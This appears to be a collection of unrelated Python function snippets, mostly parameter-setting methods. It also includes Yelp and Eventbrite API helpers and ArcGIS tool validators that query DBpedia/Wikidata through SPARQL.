"def setupParameters(self, **pars):\n \n seldict = {}\n for k,v in pars.items():\n if v != None and v != \"\":\n seldict[k] = v\n \n return seldict",
"def __init__(self, *args, **kwds):\n if args or kwds:\n super(ModifyParametersResponse, self).__init__(*args, **kwds)",
"def yelp_search_biz(term: str = None, location: str = None,\n latitude: float = None,\n longitude: float = None,\n url_params: Dict = None) -> Dict:\n params = url_params.copy() if url_params else {}\n if not (location or (latitude and longitude)):\n raise ValueError(\"Either location or coordinates is required.\")\n if term:\n params['term'] = term.replace(' ', '+')\n if latitude and longitude:\n latitude = float(latitude)\n longitude = float(longitude)\n if latitude < -90 or latitude > 90 or longitude < -180 or longitude > 180:\n raise ValueError(\"Invalid latitude or longitude.\")\n params['latitude'] = latitude\n params['longitude'] = longitude\n if location:\n params['location'] = location.replace(' ', '+')\n return request_external(YELP_API_HOST,\n YELP_SEARCH_PATH, YELP_API_KEY,\n url_params=params)",
"def set_parameters(self, population_size=40, num_tests=5, num_searches=5, num_searches_best=5, num_enabled=17,\n bonus1=10, bonus2=1, local_searches=(mts_ls1, mts_ls2, mts_ls3), **kwargs):\n super().set_parameters(population_size=kwargs.pop('population_size', population_size), **kwargs)\n self.num_tests = num_tests\n self.num_searches = num_searches\n self.num_searches_best = num_searches_best\n self.num_enabled = num_enabled\n self.bonus1 = bonus1\n self.bonus2 = bonus2\n self.local_searches = local_searches",
"def set_params(self, **kwargs):\n for key, value in kwargs.items():\n if key in self.params.keys():\n self.params[key] = value\n else:\n raise KeyError",
"def request_from_yelp(host, path, bearer_token, url_params=None):\n url_params = url_params or {}\n url = '{0}{1}'.format(host, quote(path.encode('utf8')))\n headers = {\n 'Authorization': 'Bearer %s' % bearer_token,\n }\n\n\n response = requests.request('GET', url, headers=headers, params=url_params)\n\n return response.json()",
"def doParametersOfInterest(self):\n\n self.modelBuilder.doVar(\"Rdy[1.,0.0,10.0]\");\n self.modelBuilder.doVar(\"Rqcd[1,0.0,10.0]\");\n self.modelBuilder.doSet(\"POI\",\"Rdy,Rqcd\")",
"def __init__(self, api, geo, query):\n self.api = api\n # self.db = db\n self.geo = geo\n self.query = query\n\n # API rate call limit.\n self.limit = 100",
"def params(self,new):\n self._params = new\n self._config_set()\n self._make_model()",
"def set_payment_params(self, **params):\n pass",
"def __init__(self, endpoint='https://www.wikidata.org/w/api.php'):\n self.endpoint = endpoint",
"def test_make_request_params(self):\n\n expected_value = \"token=\"+EVENTBRITE_API_KEY+\"&location.longitude=-122.057403564&location.latitude=37.4192008972&location.within=20mi&page=1&categories=103%2C109&sort_by=date\"\n request_params = {\n \"token\": EVENTBRITE_API_KEY,\n \"location.latitude\": \"37.4192008972\",\n \"location.longitude\": \"-122.057403564\",\n \"location.within\": \"20mi\",\n \"sort_by\": \"date\"\n }\n url_encoded_request_params = _update_urlencode_request_params(\"103,109\", 1, request_params)\n self.assertEqual(expected_value, url_encoded_request_params)",
"def updateParameters(self, parameters):\r\n\t\tin_wikiplace_IRI = parameters[0]\r\n\t\tin_location_property = parameters[1]\r\n\t\tin_relation_degree = parameters[2]\r\n\t\tout_location = parameters[3]\r\n\t\tout_points_name = parameters[4]\r\n\t\t\r\n\t\tif in_wikiplace_IRI.value:\r\n\t\t\tinputFeatureClassName = in_wikiplace_IRI.valueAsText\r\n\t\t\tlastIndexOFGDB = inputFeatureClassName.rfind(\"\\\\\")\r\n\t\t\tfeatureClassName = inputFeatureClassName[(lastIndexOFGDB+1):]\r\n\t\t\tcurrentWorkspace = inputFeatureClassName[:lastIndexOFGDB]\r\n\r\n\t\t\tarcpy.env.workspace = currentWorkspace\r\n\t\t\tout_location.value = currentWorkspace\r\n\r\n\t\t\t# get all the IRI from input point feature class of wikidata places\r\n\t\t\tinplaceIRIList = []\r\n\t\t\tcursor = arcpy.SearchCursor(inputFeatureClassName)\r\n\t\t\tfor row in cursor:\r\n\t\t\t\tinplaceIRIList.append(row.getValue(\"URL\"))\r\n\t\t\t\r\n\t\t\t# get all the property URL which are used in the input feature class. their objects are geographic locations which have coordinates, I call them location common properties\r\n\t\t\tlocationCommonPropertyJSONObj = SPARQLQuery.locationCommonPropertyQuery(inplaceIRIList)\r\n\t\t\tlocationCommonPropertyJSON = locationCommonPropertyJSONObj[\"results\"][\"bindings\"]\r\n\r\n\t\t\tLocationPropertyPath.locationCommonPropertyURLList = []\r\n\t\t\tLocationPropertyPath.locationCommonPropertyCountList = []\r\n\t\t\tfor jsonItem in locationCommonPropertyJSON:\r\n\t\t\t\tLocationPropertyPath.locationCommonPropertyURLList.append(jsonItem[\"p\"][\"value\"])\r\n\t\t\t\tLocationPropertyPath.locationCommonPropertyCountList.append(jsonItem[\"NumofSub\"][\"value\"])\r\n\r\n\t\t\tlocationCommonPropertyCountDict = dict(zip(LocationPropertyPath.locationCommonPropertyURLList, LocationPropertyPath.locationCommonPropertyCountList))\r\n\r\n\t\t\t# get the english label for each location common property\r\n\t\t\tlocationCommonPropertyLabelJSON = SPARQLQuery.locationCommonPropertyLabelQuery(LocationPropertyPath.locationCommonPropertyURLList)\r\n\t\t\t# locationCommonPropertyLabelJSON = locationCommonPropertyLabelJSONObj[\"results\"][\"bindings\"]\r\n\r\n\t\t\t# a dictionary object: key: propertyNameCount, value: propertyURL\r\n\t\t\tLocationPropertyPath.locationCommonPropertyDict = dict()\r\n\t\t\tLocationPropertyPath.locationCommonPropertyNameCountList = []\r\n\t\t\tLocationPropertyPath.locationCommonPropertyURLList = []\r\n\t\t\tLocationPropertyPath.locationCommonPropertyCountList = []\r\n\r\n\t\t\tfor jsonItem in locationCommonPropertyLabelJSON:\r\n\t\t\t\tpropertyURL = jsonItem[\"p\"][\"value\"]\r\n\t\t\t\tLocationPropertyPath.locationCommonPropertyURLList.append(propertyURL)\r\n\r\n\t\t\t\tpropertyName = jsonItem[\"propertyLabel\"][\"value\"]\r\n\r\n\t\t\t\tpropertyCount = locationCommonPropertyCountDict[propertyURL]\r\n\t\t\t\tLocationPropertyPath.locationCommonPropertyCountList.append(propertyCount)\r\n\r\n\t\t\t\tpropertyNameCount = propertyName + \"(\" + propertyCount + \")\"\r\n\t\t\t\tLocationPropertyPath.locationCommonPropertyNameCountList.append(propertyNameCount)\r\n\t\t\t\tLocationPropertyPath.locationCommonPropertyDict[propertyNameCount] = propertyURL\r\n\r\n\t\t\tin_location_property.filter.list = LocationPropertyPath.locationCommonPropertyNameCountList\r\n\r\n\r\n\r\n\r\n\r\n\r\n\t\t\tif in_location_property.value and in_relation_degree.value and out_points_name.valueAsText == None:\r\n\t\t\t\tpropertyName = in_location_property.valueAsText\r\n\t\t\t\trelationdegree = in_relation_degree.valueAsText\r\n\r\n\t\t\t\tlastIndex = propertyName.rfind(\"(\")\r\n\t\t\t\tpropertyName = propertyName[:lastIndex]\r\n\r\n\t\t\t\tpropertyName = propertyName.replace(\" \", \"_\")\r\n\r\n\t\t\t\tif featureClassName.endswith(\".shp\"):\r\n\t\t\t\t\tlastIndex = featureClassName.rfind(\".\")\r\n\t\t\t\t\tfeatureClassNameNoShp = featureClassName[:lastIndex]\r\n\t\t\t\t\tout_points_name.value = featureClassNameNoShp + \"_D\" + relationdegree + \"_\" + propertyName + \".shp\"\r\n\t\t\t\telse:\r\n\t\t\t\t\tout_points_name.value = featureClassName + \"_D\" + relationdegree + \"_\" + propertyName\r\n\r\n\r\n\t\t\t\tif arcpy.Exists(out_points_name.valueAsText):\r\n\t\t\t\t\tarcpy.AddError(\"The output feature class name already exists in current workspace!\")\r\n\t\t\t\t\traise arcpy.ExecuteError\r\n\r\n\t\t\t\r\n\r\n\r\n\t\t\tif in_relation_degree.value:\r\n\t\t\t\trelationDegree = int(in_relation_degree.valueAsText)\r\n\t\t\t\tif relationDegree > 4:\r\n\t\t\t\t\tin_relation_degree.value = 4\r\n\r\n\r\n\r\n\r\n\r\n\t\t\t\r\n\r\n\t\treturn",
"def _set_parameters(self, parameters):\n self.parameters = parameters\n self._set_points_and_weights()",
"def set_params(self, **params):\n self.check_params(params)\n self.sk_params.update(params)\n return self",
"def test_search_yelp(self):\n\n resp = self.client.get('/v1/search?location=sf&category=restaurants')\n data = resp.get_json()\n\n self.assertEqual(resp.status_code, 200)\n self.assertIn('businesses', data)",
"def updateParameters(self, parameters):\r\n\t\tin_wikiplace_IRI = parameters[0]\r\n\t\tin_com_property = parameters[1]\r\n\t\tin_boolean_inverse_com = parameters[2]\r\n\t\tin_inverse_com_property = parameters[3]\r\n\t\tin_boolean_isPartOf = parameters[4]\r\n\t\tin_expanded_com_property = parameters[5]\r\n\t\tin_boolean_inverse_expanded_com = parameters[6]\r\n\t\tin_inverse_expanded_com_property = parameters[7]\r\n\t\t# out_location = parameters[2]\r\n\t\t# out_property_table_name = parameters[3]\r\n\t\t# out_com_property_URL = parameters[4]\r\n\r\n\t\tisInverse = False\r\n\r\n\t\tif in_boolean_inverse_com.valueAsText == 'true':\r\n\t\t\tisInverse = True\r\n\t\telif in_boolean_inverse_com.valueAsText == 'false':\r\n\t\t\tisInverse = False\r\n\r\n\r\n\t\tisExpandedPartOf = False\r\n\t\t\r\n\t\tif in_boolean_isPartOf.valueAsText == 'true':\r\n\t\t\tisExpandedPartOf = True\r\n\t\telif in_boolean_isPartOf.valueAsText == 'false':\r\n\t\t\tisExpandedPartOf = False\r\n\r\n\t\tisInverseExpanded = False\r\n\r\n\t\tif in_boolean_inverse_expanded_com.valueAsText == 'true':\r\n\t\t\tisInverseExpanded = True\r\n\t\telif in_boolean_inverse_expanded_com.valueAsText == 'false':\r\n\t\t\tisInverseExpanded = False\r\n\r\n\t\tarcpy.AddMessage((\"in_boolean_isPartOf.valueAsText: {0}\").format(in_boolean_isPartOf.valueAsText))\r\n\r\n\t\tif isInverse == False:\r\n\t\t\tin_inverse_com_property.enabled = False\r\n\t\telse:\r\n\t\t\tin_inverse_com_property.enabled = True\r\n\r\n\r\n\t\tif isExpandedPartOf == False:\r\n\t\t\tin_expanded_com_property.enabled = False\r\n\t\t\tin_inverse_expanded_com_property.enabled = False\r\n\t\telse:\r\n\t\t\tin_expanded_com_property.enabled = True\r\n\t\t\tif isInverseExpanded == False:\r\n\t\t\t\tin_inverse_expanded_com_property.enabled = False\r\n\t\t\telse:\r\n\t\t\t\tin_inverse_expanded_com_property.enabled = True\r\n\r\n\t\tif in_wikiplace_IRI.value:\r\n\t\t\tinputFeatureClassName = in_wikiplace_IRI.valueAsText\r\n\t\t\tarcpy.AddMessage(\"{0}\".format(inputFeatureClassName))\r\n\t\t\t# inputFeatureClass = arcpy.Describe(inputFeatureClassName)\r\n\t\t\tfieldList = arcpy.ListFields(inputFeatureClassName)\r\n\t\t\tisURLinFieldList = False\r\n\t\t\tfor field in fieldList:\r\n\t\t\t\tif field.name == \"URL\":\r\n\t\t\t\t\tisURLinFieldList = True\r\n\r\n\t\t\tif isURLinFieldList == False:\r\n\t\t\t\tarcpy.AddErrorMessage(\"Please a point feature class which include a 'URL' Field for the wikidata IRI of this entity\")\r\n\t\t\t\traise arcpy.ExecuteError\r\n\t\t\telse:\r\n\t\t\t\t# update the output directory of this tool to the same geodatabase \r\n\t\t\t\tlastIndexOFGDB = inputFeatureClassName.rfind(\"\\\\\")\r\n\t\t\t\toutputLocation = inputFeatureClassName[:lastIndexOFGDB]\r\n\t\t\t\t# out_location.value = outputLocation\r\n\r\n\t\t\t\t# get all the IRI from input point feature class of wikidata places\r\n\t\t\t\tinplaceIRIList = []\r\n\t\t\t\tcursor = arcpy.SearchCursor(inputFeatureClassName)\r\n\t\t\t\tfor row in cursor:\r\n\t\t\t\t\tinplaceIRIList.append(row.getValue(\"URL\"))\r\n\r\n\t\t\t\tif len(inplaceIRIList) == 0:\r\n\t\t\t\t\tarcpy.AddMessage(\"Input Feature class do not have record\")\r\n\t\t\t\t\traise arcpy.ExecuteError\r\n\t\t\t\telse:\r\n\t\t\t\t\t# get the direct common property \r\n\t\t\t\t\tcommonPropertyJSONObj = SPARQLQuery.commonPropertyQuery(inplaceIRIList)\r\n\t\t\t\t\tcommonPropertyJSON = commonPropertyJSONObj[\"results\"][\"bindings\"]\r\n\r\n\t\t\t\t\tif len(commonPropertyJSON) == 0:\r\n\t\t\t\t\t\tarcpy.AddMessage(\"No property find.\")\r\n\t\t\t\t\t\traise arcpy.ExecuteError\r\n\t\t\t\t\telse:\r\n\t\t\t\t\t\tLinkedDataPropertyEnrich.propertyURLList = []\r\n\t\t\t\t\t\tLinkedDataPropertyEnrich.propertyNameList = []\r\n\t\t\t\t\t\tLinkedDataPropertyEnrich.propertyURLDict = dict()\r\n\t\t\t\t\t\t# LinkedDataPropertyEnrich.FunctionalPropertySet = Set()\r\n\t\t\t\t\t\t# LinkedDataPropertyEnrich.noFunctionalPropertyURLList = []\r\n\t\t\t\t\t\t# LinkedDataPropertyEnrich.noFunctionalPropertyNameList = []\r\n\t\t\t\t\t\t# LinkedDataPropertyEnrich.noFunctionalPropertyURLDict = dict()\r\n\r\n\t\t\t\t\t\tfor jsonItem in commonPropertyJSON:\r\n\t\t\t\t\t\t\tpropertyURL = jsonItem[\"p\"][\"value\"]\r\n\t\t\t\t\t\t\tif \"http://dbpedia.org/ontology/\" in propertyURL or \"http://dbpedia.org/property/\" in propertyURL:\r\n\t\t\t\t\t\t\t\tif propertyURL not in LinkedDataPropertyEnrich.propertyURLList:\r\n\t\t\t\t\t\t\t\t\tLinkedDataPropertyEnrich.propertyURLList.append(propertyURL)\r\n\t\t\t\t\t\t\t\t\tlastIndex = propertyURL.rfind(\"/\")\r\n\t\t\t\t\t\t\t\t\tpropertyName = propertyURL[(lastIndex+1):]\r\n\t\t\t\t\t\t\t\t\tif \"http://dbpedia.org/ontology/\" in propertyURL:\r\n\t\t\t\t\t\t\t\t\t\tlastIndex = len(\"http://dbpedia.org/ontology/\")\r\n\t\t\t\t\t\t\t\t\t\tpropertyName = propertyURL[lastIndex:]\r\n\t\t\t\t\t\t\t\t\t\tpropertyName = \"dbo:\" + propertyName + \"(\" + jsonItem[\"NumofSub\"][\"value\"] + \")\"\r\n\t\t\t\t\t\t\t\t\telif \"http://dbpedia.org/property/\" in propertyURL:\r\n\t\t\t\t\t\t\t\t\t\tlastIndex = len(\"http://dbpedia.org/property/\")\r\n\t\t\t\t\t\t\t\t\t\tpropertyName = propertyURL[lastIndex:]\r\n\t\t\t\t\t\t\t\t\t\tpropertyName = \"dbp:\" + propertyName + \"(\" + jsonItem[\"NumofSub\"][\"value\"] + \")\"\r\n\t\t\t\t\t\t\t\t\t# propertyName = propertyName + \"(\" + jsonItem[\"NumofSub\"][\"value\"] + \")\"\r\n\t\t\t\t\t\t\t\t\tLinkedDataPropertyEnrich.propertyNameList.append(propertyName)\r\n\t\t\t\t\t\t\t\t# propertyNameURLList.append(propertyURL + \" \" +propertyName)\r\n\t\t\t\t\t\tLinkedDataPropertyEnrich.propertyURLDict = dict(zip(LinkedDataPropertyEnrich.propertyNameList, LinkedDataPropertyEnrich.propertyURLList))\r\n\r\n\t\t\t\t\t\tin_com_property.filter.list = LinkedDataPropertyEnrich.propertyNameList\r\n\t\t\t\t\t\t# in_com_property.filters[0] = LinkedDataPropertyEnrich.propertyNameList\r\n\t\t\t\t\t\t# in_com_property.filter.list = LinkedDataPropertyEnrich.propertyNameList\r\n\t\t\t\t\t\t# in_com_property.filters[0].list = LinkedDataPropertyEnrich.propertyNameList\r\n\t\t\t\t\t\t# in_com_property.filters[1].list = LinkedDataPropertyEnrich.propertyURLList\r\n\t\t\t\t\t\t# arcpy.AddMessage(\"URLLIst: {0}\".format(LinkedDataPropertyEnrich.propertyURLList))\r\n\t\t\t\t\t\t# arcpy.AddMessage(\"NameLIst: {0}\".format(LinkedDataPropertyEnrich.propertyNameList))\r\n\t\t\t\t\t\t# out_com_property_URL.filter.list = LinkedDataPropertyEnrich.propertyURLList\r\n\r\n\t\t\t\t\t# get the inverse direct common property \r\n\t\t\t\t\tif isInverse == True:\r\n\t\t\t\t\t\tinverseCommonPropertyJSONObj = SPARQLQuery.inverseCommonPropertyQuery(inplaceIRIList)\r\n\t\t\t\t\t\tinverseCommonPropertyJSON = inverseCommonPropertyJSONObj[\"results\"][\"bindings\"]\r\n\r\n\t\t\t\t\t\tif len(inverseCommonPropertyJSON) == 0:\r\n\t\t\t\t\t\t\tarcpy.AddMessage(\"No inverse property find.\")\r\n\t\t\t\t\t\t\traise arcpy.ExecuteError\r\n\t\t\t\t\t\telse:\r\n\t\t\t\t\t\t\tLinkedDataPropertyEnrich.inversePropertyNameList = []\r\n\t\t\t\t\t\t\tLinkedDataPropertyEnrich.inversePropertyURLList = []\r\n\t\t\t\t\t\t\tLinkedDataPropertyEnrich.inversePropertyURLDict = dict()\r\n\t\t\t\t\t\t\t# LinkedDataPropertyEnrich.propertyURLList = []\r\n\t\t\t\t\t\t\t# LinkedDataPropertyEnrich.propertyNameList = []\r\n\t\t\t\t\t\t\t# LinkedDataPropertyEnrich.propertyURLDict = dict()\r\n\t\t\t\t\t\t\t\r\n\r\n\t\t\t\t\t\t\tfor jsonItem in inverseCommonPropertyJSON:\r\n\t\t\t\t\t\t\t\tpropertyURL = jsonItem[\"p\"][\"value\"]\r\n\t\t\t\t\t\t\t\tif \"http://dbpedia.org/ontology/\" in propertyURL or \"http://dbpedia.org/property/\" in propertyURL:\r\n\t\t\t\t\t\t\t\t\tif propertyURL not in LinkedDataPropertyEnrich.inversePropertyURLList:\r\n\t\t\t\t\t\t\t\t\t\tLinkedDataPropertyEnrich.inversePropertyURLList.append(propertyURL)\r\n\t\t\t\t\t\t\t\t\t\t# lastIndex = propertyURL.rfind(\"/\")\r\n\t\t\t\t\t\t\t\t\t\t# propertyName = propertyURL[(lastIndex+1):]\r\n\t\t\t\t\t\t\t\t\t\tif \"http://dbpedia.org/ontology/\" in propertyURL:\r\n\t\t\t\t\t\t\t\t\t\t\tlastIndex = len(\"http://dbpedia.org/ontology/\")\r\n\t\t\t\t\t\t\t\t\t\t\tpropertyName = propertyURL[lastIndex:]\r\n\t\t\t\t\t\t\t\t\t\t\tpropertyName = \"is dbo:\" + propertyName + \" Of (\" + jsonItem[\"NumofSub\"][\"value\"] + \")\"\r\n\t\t\t\t\t\t\t\t\t\telif \"http://dbpedia.org/property/\" in propertyURL:\r\n\t\t\t\t\t\t\t\t\t\t\tlastIndex = len(\"http://dbpedia.org/property/\")\r\n\t\t\t\t\t\t\t\t\t\t\tpropertyName = propertyURL[lastIndex:]\r\n\t\t\t\t\t\t\t\t\t\t\tpropertyName = \"is dbp:\" + propertyName + \" Of (\" + jsonItem[\"NumofSub\"][\"value\"] + \")\"\r\n\t\t\t\t\t\t\t\t\t\t# propertyName = propertyName + \"(\" + jsonItem[\"NumofSub\"][\"value\"] + \")\"\r\n\t\t\t\t\t\t\t\t\t\tLinkedDataPropertyEnrich.inversePropertyNameList.append(propertyName)\r\n\t\t\t\t\t\t\t\t\t# propertyNameURLList.append(propertyURL + \" \" +propertyName)\r\n\t\t\t\t\t\t\tLinkedDataPropertyEnrich.inversePropertyURLDict = dict(zip(LinkedDataPropertyEnrich.inversePropertyNameList, LinkedDataPropertyEnrich.inversePropertyURLList))\r\n\r\n\t\t\t\t\t\t\tin_inverse_com_property.filter.list = LinkedDataPropertyEnrich.inversePropertyNameList\r\n\r\n\t\t\t\t\tif isExpandedPartOf == True:\r\n\t\t\t\t\t\texpandedCommonPropertyJSONObj = SPARQLQuery.locationDBpediaExpandedCommonPropertyQuery(inplaceIRIList)\r\n\t\t\t\t\t\texpandedCommonPropertyJSON = expandedCommonPropertyJSONObj[\"results\"][\"bindings\"]\r\n\r\n\t\t\t\t\t\tif len(expandedCommonPropertyJSON) == 0:\r\n\t\t\t\t\t\t\tarcpy.AddMessage(\"No expanded property find.\")\r\n\t\t\t\t\t\t\traise arcpy.ExecuteError\r\n\t\t\t\t\t\telse:\r\n\t\t\t\t\t\t\t# LinkedDataPropertyEnrich.propertyURLList = []\r\n\t\t\t\t\t\t\t# LinkedDataPropertyEnrich.propertyNameList = []\r\n\t\t\t\t\t\t\t# LinkedDataPropertyEnrich.propertyURLDict = dict()\r\n\t\t\t\t\t\t\t# LinkedDataPropertyEnrich.FunctionalPropertySet = Set()\r\n\t\t\t\t\t\t\tLinkedDataPropertyEnrich.expandedPropertyNameList = []\r\n\t\t\t\t\t\t\tLinkedDataPropertyEnrich.expandedPropertyURLList = []\r\n\t\t\t\t\t\t\tLinkedDataPropertyEnrich.expandedPropertyURLDict = dict()\r\n\r\n\t\t\t\t\t\t\tfor jsonItem in expandedCommonPropertyJSON:\r\n\t\t\t\t\t\t\t\tpropertyURL = jsonItem[\"p\"][\"value\"]\r\n\t\t\t\t\t\t\t\tif \"http://dbpedia.org/ontology/\" in propertyURL or \"http://dbpedia.org/property/\" in propertyURL:\r\n\t\t\t\t\t\t\t\t\tif propertyURL not in LinkedDataPropertyEnrich.expandedPropertyURLList:\r\n\t\t\t\t\t\t\t\t\t\tLinkedDataPropertyEnrich.expandedPropertyURLList.append(propertyURL)\r\n\t\t\t\t\t\t\t\t\t\t# lastIndex = propertyURL.rfind(\"/\")\r\n\t\t\t\t\t\t\t\t\t\t# propertyName = propertyURL[(lastIndex+1):]\r\n\t\t\t\t\t\t\t\t\t\tif \"http://dbpedia.org/ontology/\" in propertyURL:\r\n\t\t\t\t\t\t\t\t\t\t\tlastIndex = len(\"http://dbpedia.org/ontology/\")\r\n\t\t\t\t\t\t\t\t\t\t\tpropertyName = propertyURL[lastIndex:]\r\n\t\t\t\t\t\t\t\t\t\t\tpropertyName = \"dbo:\" + propertyName + \"(\" + jsonItem[\"NumofSub\"][\"value\"] + \")\"\r\n\t\t\t\t\t\t\t\t\t\telif \"http://dbpedia.org/property/\" in propertyURL:\r\n\t\t\t\t\t\t\t\t\t\t\tlastIndex = len(\"http://dbpedia.org/property/\")\r\n\t\t\t\t\t\t\t\t\t\t\tpropertyName = propertyURL[lastIndex:]\r\n\t\t\t\t\t\t\t\t\t\t\tpropertyName = \"dbp:\" + propertyName + \"(\" + jsonItem[\"NumofSub\"][\"value\"] + \")\"\r\n\t\t\t\t\t\t\t\t\t\t# propertyName = propertyName + \"(\" + jsonItem[\"NumofSub\"][\"value\"] + \")\"\r\n\t\t\t\t\t\t\t\t\t\tLinkedDataPropertyEnrich.expandedPropertyNameList.append(propertyName)\r\n\t\t\t\t\t\t\t\t\t# propertyNameURLList.append(propertyURL + \" \" +propertyName)\r\n\t\t\t\t\t\t\tLinkedDataPropertyEnrich.expandedPropertyURLDict = dict(zip(LinkedDataPropertyEnrich.expandedPropertyNameList, LinkedDataPropertyEnrich.expandedPropertyURLList))\r\n\r\n\t\t\t\t\t\t\tin_expanded_com_property.filter.list = LinkedDataPropertyEnrich.expandedPropertyNameList\r\n\r\n\r\n\t\t\t\t\t\tif isInverseExpanded == True:\r\n\t\t\t\t\t\t\tinverseExpandedCommonPropertyJSONObj = SPARQLQuery.locationDBpediaInverseExpandedCommonPropertyQuery(inplaceIRIList)\r\n\t\t\t\t\t\t\tinverseExpandedCommonPropertyJSON = inverseExpandedCommonPropertyJSONObj[\"results\"][\"bindings\"]\r\n\r\n\t\t\t\t\t\t\tif len(inverseExpandedCommonPropertyJSON) == 0:\r\n\t\t\t\t\t\t\t\tarcpy.AddMessage(\"No inverse expanded property find.\")\r\n\t\t\t\t\t\t\t\traise arcpy.ExecuteError\r\n\t\t\t\t\t\t\telse:\r\n\t\t\t\t\t\t\t\t# LinkedDataPropertyEnrich.propertyURLList = []\r\n\t\t\t\t\t\t\t\t# LinkedDataPropertyEnrich.propertyNameList = []\r\n\t\t\t\t\t\t\t\t# LinkedDataPropertyEnrich.propertyURLDict = dict()\r\n\t\t\t\t\t\t\t\t# LinkedDataPropertyEnrich.FunctionalPropertySet = Set()\r\n\t\t\t\t\t\t\t\tLinkedDataPropertyEnrich.inverseExpandedPropertyNameList = []\r\n\t\t\t\t\t\t\t\tLinkedDataPropertyEnrich.inverseExpandedPropertyURLList = []\r\n\t\t\t\t\t\t\t\tLinkedDataPropertyEnrich.inverseExpandedPropertyURLDict = dict()\r\n\r\n\t\t\t\t\t\t\t\tfor jsonItem in inverseExpandedCommonPropertyJSON:\r\n\t\t\t\t\t\t\t\t\tpropertyURL = jsonItem[\"p\"][\"value\"]\r\n\t\t\t\t\t\t\t\t\tif \"http://dbpedia.org/ontology/\" in propertyURL or \"http://dbpedia.org/property/\" in propertyURL:\r\n\t\t\t\t\t\t\t\t\t\tif propertyURL not in LinkedDataPropertyEnrich.inverseExpandedPropertyURLList:\r\n\t\t\t\t\t\t\t\t\t\t\tLinkedDataPropertyEnrich.inverseExpandedPropertyURLList.append(propertyURL)\r\n\t\t\t\t\t\t\t\t\t\t\t\r\n\t\t\t\t\t\t\t\t\t\t\tif \"http://dbpedia.org/ontology/\" in propertyURL:\r\n\t\t\t\t\t\t\t\t\t\t\t\tlastIndex = len(\"http://dbpedia.org/ontology/\")\r\n\t\t\t\t\t\t\t\t\t\t\t\tpropertyName = propertyURL[lastIndex:]\r\n\t\t\t\t\t\t\t\t\t\t\t\tpropertyName = \"is dbo:\" + propertyName + \" Of (\" + jsonItem[\"NumofSub\"][\"value\"] + \")\"\r\n\t\t\t\t\t\t\t\t\t\t\telif \"http://dbpedia.org/property/\" in propertyURL:\r\n\t\t\t\t\t\t\t\t\t\t\t\tlastIndex = len(\"http://dbpedia.org/property/\")\r\n\t\t\t\t\t\t\t\t\t\t\t\tpropertyName = propertyURL[lastIndex:]\r\n\t\t\t\t\t\t\t\t\t\t\t\tpropertyName = \"is dbp:\" + propertyName + \" Of (\" + jsonItem[\"NumofSub\"][\"value\"] + \")\"\r\n\t\t\t\t\t\t\t\t\t\t\t# propertyName = propertyName + \"(\" + jsonItem[\"NumofSub\"][\"value\"] + \")\"\r\n\t\t\t\t\t\t\t\t\t\t\tLinkedDataPropertyEnrich.inverseExpandedPropertyNameList.append(propertyName)\r\n\t\t\t\t\t\t\t\t\t\t# propertyNameURLList.append(propertyURL + \" \" +propertyName)\r\n\t\t\t\t\t\t\t\tLinkedDataPropertyEnrich.inverseExpandedPropertyURLDict = dict(zip(LinkedDataPropertyEnrich.inverseExpandedPropertyNameList, LinkedDataPropertyEnrich.inverseExpandedPropertyURLList))\r\n\r\n\t\t\t\t\t\t\t\tin_inverse_expanded_com_property.filter.list = LinkedDataPropertyEnrich.inverseExpandedPropertyNameList\r\n\r\n\r\n\t\t\t\t\t\t# # send a SPARQL query to DBpedia endpoint to test whether the properties are functionalProperty\r\n\t\t\t\t\t\t# isFuncnalPropertyJSONObj = SPARQLQuery.functionalPropertyQuery(LinkedDataPropertyEnrich.propertyURLList)\r\n\t\t\t\t\t\t# isFuncnalPropertyJSON = isFuncnalPropertyJSONObj[\"results\"][\"bindings\"]\r\n\r\n\t\t\t\t\t\t# FunctionalPropertySet = Set()\r\n\t\t\t\r\n\t\t\t\t\t\t# for jsonItem in isFuncnalPropertyJSON:\r\n\t\t\t\t\t\t# \tfunctionalPropertyURL = jsonItem[\"property\"][\"value\"]\r\n\t\t\t\t\t\t# \tFunctionalPropertySet.add(functionalPropertyURL)\r\n\r\n\t\t\t\t\t\t# LinkedDataPropertyEnrich.FunctionalPropertySet = FunctionalPropertySet\r\n\r\n\r\n\t\t\t\t\t\t# use set differences to get the no functional property set \r\n\t\t\t\t\t\t# propertyURLSet = Set(LinkedDataPropertyEnrich.propertyURLList)\r\n\t\t\t\t\t\t# noFunctionalPropertySet = propertyURLSet.difference(FunctionalPropertySet)\r\n\t\t\t\t\t\t# LinkedDataPropertyEnrich.noFunctionalPropertyURLList = list(noFunctionalPropertySet)\r\n\r\n\t\t\t\t\t\t# for propertyURL in LinkedDataPropertyEnrich.noFunctionalPropertyURLList:\r\n\t\t\t\t\t\t# \tif \"http://dbpedia.org/ontology/\" in propertyURL:\r\n\t\t\t\t\t\t# \t\tlastIndex = len(\"http://dbpedia.org/ontology/\")\r\n\t\t\t\t\t\t# \t\tpropertyName = propertyURL[lastIndex:]\r\n\t\t\t\t\t\t# \t\tpropertyName = \"dbo:\" + propertyName\r\n\t\t\t\t\t\t# \telif \"http://dbpedia.org/property/\" in propertyURL:\r\n\t\t\t\t\t\t# \t\tlastIndex = len(\"http://dbpedia.org/property/\")\r\n\t\t\t\t\t\t# \t\tpropertyName = propertyURL[lastIndex:]\r\n\t\t\t\t\t\t# \t\tpropertyName = \"dbp:\" + propertyName\r\n\r\n\t\t\t\t\t\t# \tLinkedDataPropertyEnrich.noFunctionalPropertyNameList.append(propertyName)\r\n\r\n\t\t\t\t\t\t# LinkedDataPropertyEnrich.noFunctionalPropertyURLDict = dict(zip(LinkedDataPropertyEnrich.noFunctionalPropertyNameList, LinkedDataPropertyEnrich.noFunctionalPropertyURLList))\r\n\r\n\r\n\t\treturn",
"def set_params(self, **params):\n if('threshold' in params.keys()):\n self.threshold = params['threshold']\n if('subsample' in params.keys()):\n self.subsample = params['subsample']\n if('estimator' in params.keys()):\n self.estimator = params['estimator']\n if('n_folds' in params.keys()):\n self.n_folds = params['n_folds']\n if('stratify' in params.keys()):\n self.stratify = params['stratify']\n if('random_state' in params.keys()):\n self.random_state = params['random_state']\n if('n_jobs' in params.keys()):\n self.n_jobs = params['n_jobs']",
"def update_parameters(self,like_params):\n\n # get current dictionary with parameters, update and setup again\n params=self.get_params()\n\n for par in like_params:\n if par.name in params:\n params[par.name]=par.value\n\n self._setup_from_parameters(params)\n return",
"def _setup_params(self) -> None:\n self.i = 0 # Year\n self.ela = self.ela_start # Equilibrium line altitude\n self.steady_state = False # Control variable for steady state\n self.fracd8_mode = \"limited\" # Mode of the fracd8 algorithm",
